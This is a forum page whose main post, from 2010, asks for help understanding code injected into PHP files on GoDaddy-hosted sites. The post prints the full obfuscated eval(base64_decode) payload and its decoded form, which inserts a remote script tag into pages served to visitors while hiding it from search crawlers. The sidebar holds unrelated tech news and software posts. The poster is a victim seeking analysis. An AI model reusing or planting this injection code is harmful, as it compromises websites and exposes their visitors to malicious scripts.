-
Posts
-
By Aditya Tiwari · Posted
7 Days: Windows 11 turns five, Ford made a mistake, and Starlink plans direct mobile service by Aditya Tiwari 7 Days is a weekly roundup of picks of what's been happening in the world of technology - written with a dash of humor, a hint of exasperation, and an endless supply of (black) coffee. This week's highlights include Apple's $4 billion class-action lawsuit, a smartphone with a 14,000 mAh battery, Google catching up with Anthropic, and the Steam Summer Sale 2026. Let's get started. You can check out the recent issues of the 7 Days weekly roundup. Windows 11 turns five Microsoft's Windows 11 operating system completed five years of existence on June 24 this week. According to the latest data, the controversial operating system now runs on almost 72% of Windows PCs worldwide. The launch of Windows 11 had several dramatic twists and an entire preview build leaked ahead of launch. Ford made a mistake Many would agree that one of the biggest mistakes the automobile industry made was surrendering to the giant touchscreens and removing physical buttons. However, Ford made even more. The company executives said they made a mistake by replacing human engineers with AI. Ford admitted that AI couldn't replace experienced engineers and the company is rehiring veterans to improve quality and cut recall costs. Starlink mobile service Elon Musk's SpaceX wants to use its massive constellation of satellites to power your phone's network. The company is reportedly considering building a terrestrial mobile network to complement Starlink’s satellite coverage and planning to sell mobile phone plans directly to customers in the US as part of a wider expansion of Starlink. Our Features Our coffee-powered team published a platter of editorials, opinion posts, hands-on experiences, and guides. Check them out: Hey Google, these are the Gemini features I want in 2026 You've tried DuckDuckGo and Brave Search, now get serious with SearXNG Why Delta Chat is the best decentralized messenger you have probably never tried We check out the SKG PS700 Neck Massager SKG Hand Massager with Heat OS500 hands on Hands-on with BOOX Tappy: cute little reading accessory Hands-on with the ProtoArc EM25: Affordable ergonomic mouse that focuses on the right things Hands-on with iFlyTek AINote 2 E-Ink tablet: insanely thin and smart This week in software news Catch up on some of the latest software news updates that arrived throughout the week: Firefox 152.02: The latest browser update brought fixes for performance, translation, and cloud storage services. It addressed problems with localization, playback issues with certain MP4 files, and performance issues on websites that perform multiple encryption operations simultaneously. Ubuntu Livepatch: Canonical's zero-downtime service Livepatch arrived on Arm64 devices running Ubuntu Core 26 and Ubuntu 26.04 LTS. Livepatch allows users to apply important kernel updates without any service interruption or rebooting. AMD 26.6.2 driver: The new driver version for Radeon hardware owners brought FSR 4.1 upscaling tech to an entire generation of its products: the RX 7000 series. However, the 26.6.2 FSR driver flew dark clouds over users, breaking many Windows PCs and causing a yellow bang or other launch failures on Windows 10. AMD later pushed the 26.6.3 Hotfix update to fix the issues. Goodbye Notion email: It's been a little over a year since the AI-powered email client launched. The company has announced its shutdown, which will take effect on September 22, and said it doesn't see the point in maintaining a frontend email client when people are moving towards automation. Ventoy version 1.1.14: The biggest change in the Rufus alternative is an updated Secure Boot shim file to resolve the UEFI CA 2023 issue, a compatibility problem that affected Secure Boot environments on some systems. This week in hardware news Image: Valve Catch up on some of the latest software news updates that arrived throughout the week: 14,000 mAh battery: Yes, that's something that iPhone users can only dream of. But a Chinese company is reportedly developing a smartphone with a 14,000mAh battery. If it ever sees daylight, it would be the largest battery ever on a smartphone, possibly offering a week of backup on a single charge. Steam Machine prices: Valve finally confirmed the Steam Machine's pricing. Starting at $1,049 for the 512GB option, storage and the included controller are the biggest differences among the four variants presented. Xbox just got more expensive: Rising costs of storage and memory prompted Microsoft to raise prices. Xbox Series X|S models wth 512GB storage will cost $100 extra, and 1TB models will cost $150 extra. However, the Redmond giant discounted the 2TB models. New NVIDIA supercomputers: The company announced plans to deploy 35 high-performance (HPC) AI supercomputers across Europe this year, primarily at national supercomputer centers, AI factories, and research institutes. Fast fast memory: Samsung built the UFS 5.0 storage solution, which pushes the data transfer speeds to 10.8 GB/s on mobile devices. It can open doors for faster local AI performance, which otherwise doesn't look promising under the current scenario. Custom chips for TikTok: Qualcomm is reportedly in talks with ByteDance to build custom video chips optimized for its massive data center workloads. ByteDance needs hardware that can help it ingest, process, and serve billions of short-form videos daily. OpenAI Jalapeño: The AI giant announced its first custom-designed AI chip developed in partnership with Broadcom. Jalapeño is designed specifically for large language model inference and is the first product from a multi-generation compute platform being developed by OpenAI. Galaxy A27 5G: The new mid-range smartphone from Samsung arrived with a platter of updates over A25 5G, including a 120Hz refresh rate, Infinity-O punch-hole camera design, expanded AI features, and more. Qualcomm takes on NVIDIA: The chipmaker baked the new Dragonfly CPU, High Bandwidth Compute technology, and AI chips to challenge NVIDIA in the AI data center market. Qualcomm said its new lineup improved per-watt performance, token throughput, and total cost of ownership for AI data centers. IBM goes sub-1nm: The company reached a semiconductor milestone by announcing the world's first sub-1-nanometer chip technology, based on a 0.7nm (7-angstrom) node. It can pack nearly 100 billion transistors onto a chip the size of a fingernail. This week in Google News Image: Google Catch up on some of the latest Google news updates that arrived throughout the week: What to expect from the Pixel 11 series: The upcoming lineup is expected to feature four different variants and a price hike due to the global memory shortage. Read our detailed coverage to know about the expected Pixel 11 specs. Stopping Google: The Free Software Foundation Europe urged the European Commission to stop Google from silently reinstalling AI models and requiring registration. Users should be able to fully uninstall AI-based features from Android devices and access interoperability features. Chasing Anthropic: The Claude-maker is making new strides every day in the AI world, but the search giant is struggling to catch up. Google is said to be reshuffling its AI coding "strike team" it created roughly about two months ago, turning it into a broader model-training group amid talent losses at DeepMind. New Google Play billing: Google has faced a long legal battle with Epic Games, and the search giant is rolling out a redesigned Play Store billing and fee structure. Available in the US, UK, and the European Economic Area, it will take effect on June 30. Error-free Sheets? A new feature in Google Sheets allows Gemini to inspect formula errors and apply corrections directly in the spreadsheet. Google said the new feature can handle pretty much everything from basic arithmetic to very complex calculations. Breeze through airports: Google Wallet became the first digital wallet to integrate with TSA PreCheck Touchless ID, a program that enables travelers to move through airport security checkpoints using facial recognition instead of a physical ID or boarding pass. Built-in computer control: Gemini 3.5 Flash got a built-in tool called Computer Use, which allows developers to build agents that navigate browsers, mobile interfaces, and desktop applications. Google Finance: The redesigned platform is now out of beta. Google has added several new features, including portfolio tracking, scheduled market briefings, and a dedicated Android app. An iOS app is planned for later in 2026. This week in Apple News Image: Apple Catch up on some of the latest Apple news updates that arrived throughout the week: Trade secrets reportedly exposed: Apple's manufacturing partner in India, Tata Electronics, confirmed a cybersecurity attack on its systems that may have exposed trade secrets of Apple and Tesla. Hackers reportedly stole up to 630 GB of data and posted up to 200,000 files on the dark web. Grab your payout: Apple is facing a class-action lawsuit in the UK and might end up paying $4 billion (£3 billion) if it loses. The iPhone-maker has been accused of trapping users in iCloud by restricting rivals from fully accessing iOS. The tribunal recently set a full trial date for October 2028. iOS 27 Beta 2: Apple's latest iPhone update is moving forward, and a new beta was pushed this week. While iOS 27 Beta 2 for developers pushed several bug fixes across the system, the AirPort Utility was deprecated; it's no longer available to new users. Price hike: Just like others, Apple has raised prices of several MacBook and iPad models, including the MacBook Neo, which now starts at $699. This comes after reports that this year's iPhone will also become expensive. Second-gen iPhone Fold: While the world is desperate to see Apple's foldable iPhone, leakers have started to talk about its second generation. Apple is expected to launch a successor in Fall 2027, featuring a wider folding display while reusing the same screen found in the first generation. The search for memory: Apple is reportedly looking at blacklisted Chinese companies amid rising memory chip prices. The company is seeking clearance from the Trump administration to purchase memory from ChangXin Memory Technologies (CXMT). This week in Meta news Image: Meta Catch up on some of the latest Meta, WhatsApp, and Instagram updates that arrived throughout the week: WhatsApp gets a new final boss: Mark Zuckerberg announced that CRED's Kunal Shah will become the next global head of WhatsApp, as Will Cathcart steps down and moves to a new role at Meta. The social media giant invested money in CRED through a Series H funding round. AI glasses in 26 styles: A new line of Meta Glasses launched in partnership with EssilorLuxottica. Starting at $299, it comes in more than two dozen styles across different colors, lenses, and frames. More ways to doomscroll: Instagram for TV is now available on Samsung smart TVs launched in 2020 and later years. The company also announced that it's testing several new features on Instagram for TV, bringing it closer to YouTube and Netflix. This week in AI news Image: Microsoft Catch up on the latest artificial intelligence news updates that arrived throughout the week: Water-saving data center: Microsoft is building a gas-powered AI data center with a capacity of 2 gigawatts. The company will deploy a closed-loop cooling system, saying that its total lifecycle water use will be "only a fraction of that consumed annually by a typical fast-food restaurant.” OpenAI beats Claude Mythos: GPT-5.5-Cyber got a limited release for verified defenders. It scored 85.6% on CyberGym, compared with 81.8% for GPT-5.5 and 83.8% for Claude Mythos 5. The AI giant also announced a limited preview of its new GPT-5.6 model series, whose flagship model, GPT-5.6 Sol, is targeted at demanding reasoning and agentic workloads. Proceed with caution: The Trump administration instructed OpenAI to limit the distribution of GPT-5.6 to a small group of government-approved partners rather than the general public, as has happened in the past. Claude Tag: Anthropic launched its new AI teammate for Slack, enabling teams to delegate tasks to Claude directly within Slack channels. What makes it different is that it's designed to operate as a shared assistant for an entire team rather than a single user. Challenging US dominance: The UK government has funded £60 million ($70 million) to Oxford and UCL to keep the country in the AI race by building open-source, low-hardware alternatives. The two organizations will share the money over six years. Paying for AI development: One cost is the loss of human jobs. Oracle laid off about 21,000 employees (13% of its workforce) amid increasing AI adoption. The software giant said that AI advancement and adoption "may continue to result in reductions to our workforce." GitHub strips features: It removed the ability to manually detect an AI model from its Copilot Free and Student plans. In other words, its automatic routing system is the only way to choose a model. Are you a copycat? Anthropic accused Alibaba of creating about 25,000 fraudulent accounts to copy Claude's capabilities at scale. It told US lawmakers that operators linked to Alibaba generated 28.8 million exchanges with Claude between April 22 and June 5, 2026. Reserve my memory: The semiconductor company Micron revealed that AI companies are spending billions to lock up its memory years in advance. Its customers have locked in $22 billion worth of memory supply commitments. Another AI battle: A publisher group that collectively owns 400 newspapers sued OpenAI and Microsoft for scraping their content to build AI chatbots such as ChatGPT and Copilot without compensation. Anthropic AI ban: The US government partially reversed the Anthropic AI ban, allowing it to restore Claude Mythos 5. However, it can only be deployed for a limited set of US organizations that operate and defend critical infrastructure. This week in Microsoft News In some of the hottest stories of the week: Windows 10 quietly gained a year of support and updates, Windows 11 KB5095093 released with a long list of features, and Windows 11 26H2 is finally getting the ability to disable web search results in Windows 11 Search. You can check out Taras's freshly baked Microsoft Weekly roundup to catch up on all the interesting stories this week. This week in science news Image by Pascal Küffer via Pexels Catch up on some of the latest science and out-of-this-world updates that arrived throughout the week: 13 billion-year-old secret: Scientists found that the universe's first molecule (helium hyride) reacted with hydrogen much faster in cold temperatures than previously believed. It's a new breakthrough that changes our understanding of early star formation. Cosmic Living Fossil: Astronomers found CR3, a surprisingly pristine 11.5-billion-year-old galaxy dubbed a "living fossil." It suggests the universe's first generation of stars formed much later than previously assumed. Einstein's 100-year-old theory: Thanks to relativity, researchers calculated that clocks on Mars tick 477 microseconds faster per day than on Earth. This minute gravitational difference is crucial for synchronizing future interplanetary space missions. Don't panic: NASA's James Webb Telescope finally eliminated the threat of asteroid 2024 YR4 striking the moon in 2032. The rocky giant will give us a safe fly-by without causing any harm. This week in gaming? The latest issue of Pulasthi's Weekend PC Game Deals curates several exciting games on sale this week. RollerCoaster Tycoon 3 Complete Edition and Voidwrought have replaced the old titles in this week's Epic Games Store giveaway. For Xbox Free Play Days, the new titles include House Flipper 2, Blades of Fire, and Assetto Corsa Competizione. Steam Summer Sale 2026 kicked off with discounts for everything from the newest games and retro gems to all sorts of DLC packs, until July 9. Meanwhile, NVIDIA GeForce NOW added support for several new titles, including Dark Scrolls, SAND: Raiders of Sophie, and EMPULSE. That said, here are some more stories from the gaming world: Age of Empires Mobile comes to PC, here's how to carry over progress from your phone Xbox Insiders get Xbox 360 achievements and Gamertag character upgrades Grand Theft Auto VI pricing revealed alongside Ultimate Edition and pre-loading details Sony announces Bungie layoffs that will affect "significant number of employees" From the review corner This week, Steven published a review of the TerraMaster F4-425 Pro AI-powered NAS, featuring an all-metal exterior on the lines of the four-bay F4-425 series. Powered by the octa-core Intel Core N350, the TerraMaster F4-425 Pro is highly energy-efficient, operates quietly, and offers three M.2 slots. On the flip side, OpenClaw support requires removing security hardening (SPC), AI requires a paid subscription, the software feels like a beta, and the rubber feet constantly come unstuck. ZimaBoard 2 1664 Starter Kit Another NAS setup reviewed this week is the ZimaBoard 2 by IceWhale Technology. It comes in a small footprint with great modern hardware through a combo of Intel N150 and DDR5 memory support. On the downside, the memory is not upgradeable, ZimaOS is a bit barebones, factory reset requires USB flashing, and there is no automatic backup via the mobile app. Synology's BeeCamera software Christopher wrote his review of the software that powers BeeCamera Plus and said "the BeeCamera app is a great way to add private home monitoring to your network but there are some limitations." It's free with an easy setup process, fast response time, and good AI and detection features. However, there is no desktop version; it only works with Synology cameras, some configurations are difficult to set up on a phone, and it lacks the features of the surveillance station. More price drops! We got you covered with some hot tech deals all week. For some reason, if you missed out on a great discount, here is a summary of some recent deals that are still alive: Onkyo Dolby Atmos AV receivers are really solid deals 4TB TEAMGROUP MP44Q, 2TB T-Force G50, and 2TB WD My Passport SSDs drop to great prices Edifier S3000MKII hi-fi audiophile grade bookshelf speaker is at its lowest price now The best controller for XBOX and PC is down to the lowest price Limited time Prime Day deal cuts price of this Hisense 65" 4K smart TV in half To view all of our recent deals, click here. So, these were some of the biggest tech news and other updates from this week. There will be more issues of our 7 Days series in the coming weeks and months, so stay tuned. You can also support Neowin by registering for a free member account or subscribing to extra member benefits, along with an ad-free tier option. Have a great weekend! -
-
By Copernic · Posted
Zen Browser 1.21.4b by Razvan Serea Zen Browser is a privacy-focused, open-source web browser built on Mozilla Firefox, offering users a secure and customizable browsing experience. It emphasizes privacy by blocking trackers, ads, and ensuring your data isn't collected. With Zen Mods, users can enhance their browser experience with various customization options, including features like split views and vertical tabs. The browser is designed for efficiency, providing fast browsing speeds and a lightweight interface. Zen Browser prioritizes user control over the browsing experience, offering a minimal yet powerful alternative to traditional web browsers while keeping your online activity private. Zen Browser’s DRM limitation Zen Browser currently lacks support for DRM-protected content, meaning streaming services like Netflix and HBO Max are inaccessible. This is due to the absence of a Widevine license, which requires significant costs and is financially unfeasible for the developer. Additionally, applying for this license would require Zen to be part of a larger company, similar to Mozilla or Brave. Therefore, DRM-protected media won't be supported in Zen Browser for the foreseeable future. Zen Browser offers features that improve user experience, privacy, and customization: Privacy-Focused: Blocks trackers and minimizes data collection. Automatic Updates: Keeps the browser updated with security patches. Zen Mods: Customizable themes and layouts. Workspaces: Organize tabs into different workspaces. Compact Mode: Maximizes screen space by minimizing UI elements. Zen Glance: Quick website previews. Split Views: View multiple tabs in the same window. Sidebar: Access bookmarks and tools quickly. Vertical Tabs: Manage tabs vertically. Container Tabs: Separate browsing sessions. Fast Profile Switcher: Switch between profiles easily. Tab Folders: Organize tabs into folders. Customizable UI: Personalize browser interface. Security Features: Inherits Firefox’s robust security. Fast Performance: Lightweight and optimized for speed. Zen Mods Customization: Deep customization with mods. Quick Access: Easy access to favorite websites. Open Source: Built on Mozilla Firefox with community collaboration. Community-Driven: Active development and feedback from users. GitHub Repository: Contribute and review the source code. Zen Browser 1.21.4b changelog: New Features Updated to Firefox 152.0.2 and 152.0.3 Added 'Edit pinned tab' context menu item to manually set a pinned tab's URL Added 'Add Route for Domain' context menu item to quickly add a tab's domain to the Space Routing settings Fixes Prevent sidebar from flickering when moving a tab (#14131) Full-screening while on a glance tab will now expand the glance tab to a normal tab (#11766) Fixed space routing tabs opening in background when it should be in foreground (#14183) Other minor bug fixes and improvements. Download: Zen Browser | 90.2 MB (Open Source) Download: Zen Browser ARM64 | Other Operating Systems View: Zen Browser Home Page | Screenshots 1 | 2 | Reddit Get alerted to all of our Software updates on Twitter at @NeowinSoftware -
By Som · Posted
I was using searxng for about a year , self hosted, but results were starting to timeout and eventually it became unusable so I switched to degoog. Much better for my needs, more polished and add-ons like maps and calculations etc -
.thumb.png.b7089ebbdf00d96b3b92dddbd04bac02.png)
By PsYcHoKiLLa · Posted
Fake Superman doing the Anti-Trump PR for us, good man !
-
-
Recent Achievements
-
JuvenileDelinquent earned a badge
Reacting Well
-
Excellence2025 earned a badge
One Month Later
-
Excellence2025 earned a badge
Week One Done
-
flexorcist earned a badge
Week One Done
-
Woland13 earned a badge
Week One Done
-
-
Popular Contributors
-
Tell a friend
.thumb.png.b7089ebbdf00d96b3b92dddbd04bac02.png)
Question
TonyLock
I'm sure some of you may be aware of the situation But as of yesterday (May 1, 2010) at around 2 AM, there was a major hack attempt on GoDaddy. At about 10 AM, GoDaddy Tweeted about this matter (See Tweet: http://twitter.com/GoDaddy/status/13199601776). The issue has not affected all of their hosting accounts and is still being investigated. The issue is not due to a flaw in WordPress as GoDaddy claims, a friend has a site that only has her own hand written PHP code and nothing more. Despite taking my friend is super obsessive about security and knows for a fact her FTP account was not compromised, she found all the PHP files on her server to be infected, even those not publicly available.
When you view the source of any of the PHP pages through the browser, you see the following line inserted just before the </body> tag:
When you examine each of the PHP pages, you see this line at the top of all of them (This was the hacked code):
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhM0F1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>When you decode this, it equates to:
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9rZGprZmpza2Rmamxza2RqZi5jb20va3AucGhwIj48L3NjcmlwdD4="); } return ""; } } if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }I don't really understand what this code exactly does. Can any PHP code experts decipher it?
GoDaddy claimed they will investigate the issue but when my friend called, she found the tech support staff were completely oblivious to the matter.
So, if you are one of the unlucky ones whose server was a part of the attack, please check the bottom of your source code to make sure the <script> tag isn't there. Otherwise contact GoDaddy and complain.
Link to comment
https://www.neowin.net/forum/topic/897610-godaddy-got-hacked-yesterday/Share on other sites
72 answers to this question
Recommended Posts